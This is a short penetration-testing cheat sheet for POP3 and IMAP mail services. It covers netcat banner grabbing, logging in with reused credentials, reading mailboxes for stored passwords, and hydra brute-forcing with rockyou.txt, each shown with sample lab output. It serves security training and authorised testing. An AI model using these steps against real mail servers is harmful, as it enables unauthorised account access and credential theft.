POP3 (110/995) / IMAP (143/993)
Banner grab
Version info — Check for exploits
nc -nv $IP 110
nc -nv $IP 143
Example Output
telnet 10.10.10.5 110
+OK Dovecot POP3 ready <1234.abc@target>
telnet 10.10.10.5 143
* OK [CAPABILITY IMAP4rev1] Dovecot IMAP ready
(Check version: Dovecot 2.2.x has known auth bypass CVEs)
Login with found creds
Try creds from other services — Read emails for more creds
telnet $IP 110
USER <user>
PASS <pass>
Example Output
telnet 10.10.10.5 110
+OK POP3 server ready
USER admin
+OK
PASS admin123
+OK Logged in.
LIST
1 1024
2 2048
(2 emails to read)
List and read emails
After POP3 login — Emails often contain passwords
LIST
RETR 1
RETR 2
Example Output
RETR 1
From: sysadmin@corp.local
Subject: New server credentials
Hi, the new server password is: Summer2024!
Please change it ASAP.
(CREDENTIALS IN EMAIL)
Brute force
If you have a username — Weak mail passwords
hydra -l <user> -P passwords.txt $IP pop3
Example Output
hydra -l admin -P rockyou.txt 10.10.10.5 pop3
[110][pop3] login: admin password: welcome1
hydra -l admin -P rockyou.txt 10.10.10.5 imap
[143][imap] login: admin password: welcome1
(Now read their emails for creds/info)